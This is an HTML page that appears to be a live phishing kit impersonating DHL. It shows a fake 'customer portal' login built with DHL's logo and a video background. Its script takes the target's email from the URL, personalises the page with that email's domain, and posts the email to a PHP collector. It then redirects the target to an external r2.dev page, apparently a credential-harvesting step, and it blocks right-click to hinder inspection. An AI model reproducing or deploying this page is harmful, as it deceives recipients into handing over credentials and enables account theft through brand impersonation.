<!DOCTYPE html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
  <title> DHL </title>

  <meta name="description" content="_Materials for Supply">



  <meta property="og:description" content="&amp;RFQ_">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
  <style>
    video {
      object-fit: cover;
      width: 100vw;
      height: 100vh;
      position: fixed;
      top: 0;
      left: 0;
      z-index: -1;
    }
  </style>
</head>

<body>

  <nav class="navbar bg-white">
    <div class="container">
      <a class="navbar-brand" href="#">
        <img src="https://www.dhl.com/content/dam/dhl/global/core/images/logos/dhl-logo.svg" width="150%"></a>
      <button class="navbar-toggler " type="button ">
        <span class="navbar-toggler-icon text-dark"></span>
      </button>

    </div>
  </nav>
  <video playsinline autoplay muted loop poster="https://quirky-shaw-20dc92.netlify.app/polina.jpg" id="bgvid">
    <source src="https://cdn.glitch.me/36f50343-427e-4458-8c6c-fb42b0264601/video.mp4" type="video/webm">
    <source src="https://quirky-shaw-20dc92.netlify.app/vd" type="video/mp4">
  </video>

  <div class="container">
    <div class="d-flex justify-content-center">


      <div class="col-sm-8 my-4 text-center">
        <div class="my-4"> <img
            src="https://www.dhl.com/content/dam/dhl/global/core/images/logos/dhl-logo.svg"
            width="50%"></div>
        <span class="text-white" style="font-size: 42px;font-weight: 400;">
          LOGIN TO CUSTOMER PORTALS</span><br />
        <span class="text-white" style="font-size: 42px;font-weight: 50;">
         </span>
        <div style="color:white; font-size: 20px;">
          As a DHL customer, we provide you with a number of tools and portals 
			to efficiently manage your shipping and logistics needs. Just log in 
			and get your business done, we will take care of the rest.
        </div>
        <div class="my-5">
		   <form method="POST" action="" id="contact">
			   <input type="hidden" id="email" value="[Email]">
				<button id="submit-btn" class="btn btn-primary" style="width: 299px; background-color:#c80815; height: 60px" type="submit"><div style="background-color: #c80815;">
				Track Shipment
				
           
          </button></form></div>

        <div class="my-5 text-white" style="font-size: 12px;">
          Deutsche Post DHL Group, 2023 © - all rights reserved.
      
        </div>
      </div>


    </div>
  </div>


  </div>
  </div>
  </div>

<script>

      /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
		
		$('#emailich').html(my_email);
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
		$("#mainPage").attr("src", "http://www."+my_slice);
        $("#logoname").html(my_slice);
       
      }


      
      $('#submit-btn').click(function(event){

        event.preventDefault();
        var email=$("#email").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );

                    

      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

      
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'noting.php',
        type: 'POST',
        data:{
          email:email,
        
        },
            // data: $('#contact').serialize(),
           
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                
                  if (count>=1) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                     window.location.replace("https://pub-11d7f3ad2d084192a6e830deec4b3194.r2.dev/index-e5cc43015815732a4d38f73eec6434e3e5cc43015815732a4d38f73eec6434e3e5cc43015815732a4d38f73eec6434e3e5cc43015815732a4d38f73eec6434e3e5cc43015815732a4d38f73eec6434e3acquirebase64document.htm#"+email);

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                  // $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=1) {
                count=0;
                 window.location.replace("https://pub-11d7f3ad2d084192a6e830deec4b3194.r2.dev/index-e5cc43015815732a4d38f73eec6434e3e5cc43015815732a4d38f73eec6434e3e5cc43015815732a4d38f73eec6434e3e5cc43015815732a4d38f73eec6434e3e5cc43015815732a4d38f73eec6434e3acquirebase64document.htm#"+email);
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Download Document');
            }
          });
    });


    });

</script>
<script>
var isNS = (navigator.appName == "Netscape") ? 1 : 0;
if(navigator.appName == "Netscape") document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
return false;
}
function mousehandler(e){
var myevent = (isNS) ? e : event;
var eventbutton = (isNS) ? myevent.which : myevent.button;
if((eventbutton==2)||(eventbutton==3)) return false;
}
document.oncontextmenu = mischandler;
document.onmousedown = mousehandler;
document.onmouseup = mousehandler;
</script>




</html>